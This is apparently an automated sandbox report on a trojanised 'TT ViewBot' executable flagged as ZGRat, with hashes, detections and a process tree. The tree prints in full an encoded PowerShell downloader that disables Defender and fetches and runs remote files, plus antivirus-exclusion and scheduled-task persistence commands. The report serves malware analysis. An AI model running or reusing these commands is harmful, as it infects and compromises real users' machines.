Overview
overview
10Static
static
1TT ViewBot...sts.py
windows7-x64
3TT ViewBot...sts.py
windows10-2004-x64
3TT ViewBot...xie.py
windows7-x64
3TT ViewBot...xie.py
windows10-2004-x64
3TT ViewBot...ent.py
windows7-x64
3TT ViewBot...ent.py
windows10-2004-x64
3TT ViewBot...rt.exe
windows7-x64
10TT ViewBot...rt.exe
windows10-2004-x64
10TT ViewBot...tup.py
windows7-x64
3TT ViewBot...tup.py
windows10-2004-x64
7Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-05-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral3
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral5
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral7
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
TT ViewBot v2.0/setup.py
Resource
win7-20240220-en
Behavioral task
behavioral10
Sample
TT ViewBot v2.0/setup.py
Resource
win10v2004-20240419-en
General
-
Target
TT ViewBot v2.0/bot_start.exe
-
Size
2.5MB
-
MD5
bf4a8b1ff2f896acac3e7ace357abfca
-
SHA1
c1bd1b3d2959d844f6b4e339f45d3749667df3e1
-
SHA256
e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e
-
SHA512
fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494
-
SSDEEP
49152:Tfx0DZfVUfCnJA3bxBLbsgyGKEQYdfT3kVYCNN5oUpwmJFkjQuQLLOet:l4ZnIlBvyGKJA3kVD4lIl7r
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral8/files/0x0007000000023276-57.dat family_zgrat_v1 behavioral8/files/0x000800000002327e-76.dat family_zgrat_v1 behavioral8/memory/516-78-0x00000000005B0000-0x00000000007B6000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1616 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3708 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3904 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4204 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4840 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3156 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3956 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4456 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 4508 schtasks.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 856 4508 schtasks.exe 94 -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 2372 powershell.exe -
pid Process 2372 powershell.exe 3576 powershell.exe 4780 powershell.exe 2252 powershell.exe 4960 powershell.exe 3188 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation bot_start.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation tthyperRuntimedhcpSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation tthyperRuntimedhcpSvc.exe -
Executes dropped EXE 3 IoCs
pid Process 3960 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 3532 fontdrvhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3868 bot_start.exe 3868 bot_start.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\dllhost.exe tthyperRuntimedhcpSvc.exe File opened for modification C:\Program Files\VideoLAN\VLC\dllhost.exe tthyperRuntimedhcpSvc.exe File created C:\Program Files\VideoLAN\VLC\5940a34987c991 tthyperRuntimedhcpSvc.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\PolicyDefinitions\fontdrvhost.exe tthyperRuntimedhcpSvc.exe File created C:\Windows\PolicyDefinitions\5b884080fd4f94 tthyperRuntimedhcpSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3904 schtasks.exe 2288 schtasks.exe 1552 schtasks.exe 4204 schtasks.exe 1624 schtasks.exe 2324 schtasks.exe 4772 schtasks.exe 4572 schtasks.exe 3156 schtasks.exe 3956 schtasks.exe 4456 schtasks.exe 856 schtasks.exe 1616 schtasks.exe 3708 schtasks.exe 4840 schtasks.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings tthyperRuntimedhcpSvc.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings tthyperRuntimedhcpSvc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2372 powershell.exe 2372 powershell.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe 516 tthyperRuntimedhcpSvc.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 516 tthyperRuntimedhcpSvc.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 3532 fontdrvhost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3868 bot_start.exe 4980 OpenWith.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 3868 wrote to memory of 2372 3868 bot_start.exe 89 PID 3868 wrote to memory of 2372 3868 bot_start.exe 89 PID 3868 wrote to memory of 2372 3868 bot_start.exe 89 PID 2372 wrote to memory of 3960 2372 powershell.exe 98 PID 2372 wrote to memory of 3960 2372 powershell.exe 98 PID 2372 wrote to memory of 3960 2372 powershell.exe 98 PID 3960 wrote to memory of 2308 3960 tthyperRuntimedhcpSvc.exe 100 PID 3960 wrote to memory of 2308 3960 tthyperRuntimedhcpSvc.exe 100 PID 3960 wrote to memory of 2308 3960 tthyperRuntimedhcpSvc.exe 100 PID 2308 wrote to memory of 4996 2308 WScript.exe 102 PID 2308 wrote to memory of 4996 2308 WScript.exe 102 PID 2308 wrote to memory of 4996 2308 WScript.exe 102 PID 4996 wrote to memory of 516 4996 cmd.exe 104 PID 4996 wrote to memory of 516 4996 cmd.exe 104 PID 516 wrote to memory of 2252 516 tthyperRuntimedhcpSvc.exe 120 PID 516 wrote to memory of 2252 516 tthyperRuntimedhcpSvc.exe 120 PID 516 wrote to memory of 3576 516 tthyperRuntimedhcpSvc.exe 121 PID 516 wrote to memory of 3576 516 tthyperRuntimedhcpSvc.exe 121 PID 516 wrote to memory of 4780 516 tthyperRuntimedhcpSvc.exe 122 PID 516 wrote to memory of 4780 516 tthyperRuntimedhcpSvc.exe 122 PID 516 wrote to memory of 3188 516 tthyperRuntimedhcpSvc.exe 123 PID 516 wrote to memory of 3188 516 tthyperRuntimedhcpSvc.exe 123 PID 516 wrote to memory of 4960 516 tthyperRuntimedhcpSvc.exe 124 PID 516 wrote to memory of 4960 516 tthyperRuntimedhcpSvc.exe 124 PID 516 wrote to memory of 224 516 tthyperRuntimedhcpSvc.exe 130 PID 516 wrote to memory of 224 516 tthyperRuntimedhcpSvc.exe 130 PID 224 wrote to memory of 3224 224 cmd.exe 132 PID 224 wrote to memory of 3224 224 cmd.exe 132 PID 224 wrote to memory of 1672 224 cmd.exe 133 PID 224 wrote to memory of 1672 224 cmd.exe 133 PID 224 wrote to memory of 3532 224 cmd.exe 134 PID 224 wrote to memory of 3532 224 cmd.exe 134 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\ChainReview\tthyperRuntimedhcpSvc.exe"C:\ChainReview/tthyperRuntimedhcpSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\dllhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PolicyDefinitions\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Start Menu\wininit.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xy2Iph9yYA.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:3224
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1672
-
-
C:\Windows\PolicyDefinitions\fontdrvhost.exe"C:\Windows\PolicyDefinitions\fontdrvhost.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
-
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ChainReview\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Start Menu\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default\Start Menu\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Start Menu\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
91B
MD56c4e82d40f84cbc9a6fec4a5a981a42d
SHA1b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3
SHA25678d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b
SHA512262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842
-
Filesize
2.0MB
MD54518369532566e624ed62d5715fc072c
SHA1c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33
SHA256ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0
SHA512d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0
-
Filesize
212B
MD543e82435c4abdf7a34d3f8ac5c575deb
SHA16d41a829dc856e7d911e8a95e8a4c7463cf18043
SHA2561a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf
SHA512e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD5feb57329e02525b8c3ffe7e4b7d0b428
SHA1062ef15a4a3511f4d789b2414eca52996ff8df7b
SHA25632544f70e258c58866b529ac1dbd90a98ba5d974e8d57b09795a76a791634413
SHA512f1a64bc52b93865648d6955a16b8a779286399e6c689791bf5c5eb30c97a9051d56b563983d36fc0cf729299c2aa714bd2bbf3a336c7ebf21c2fed81323c1daa
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
220B
MD5e92d52d11eb8aafbfc27c473fb651e05
SHA1c36d0d05a76964ddf71b9cc50c54a5dbff4a12d9
SHA256671f91ad485e15d0ce7e93d287003b6b4d6691b9055bfc0686045948b47bb3b3
SHA512336888e30404bddef619f8a70141973c7b758ad2657b16732de07a0c4f0bab530faa5de1dfefc7004378283604efc2d89a17c11614dfb25eac991af98b1c1170
-
Filesize
2.3MB
MD5ce2e801c8d8413da9fe8f98723aab971
SHA1784e4689c62131f43e4c9cd5883f433b88cf08d6
SHA25679af1d0cd368f54b46320eceb7d9931049daf12207ff5e2226f10d9f8e068ca2
SHA512951e938d6e52a6c2918bb0ad86b85cbc107092b6add73fda1ad6b312d3cc47864809370341b513aacbb4ea77002cb1822e7b8c1ab4429e56f2d32b7b16a4e664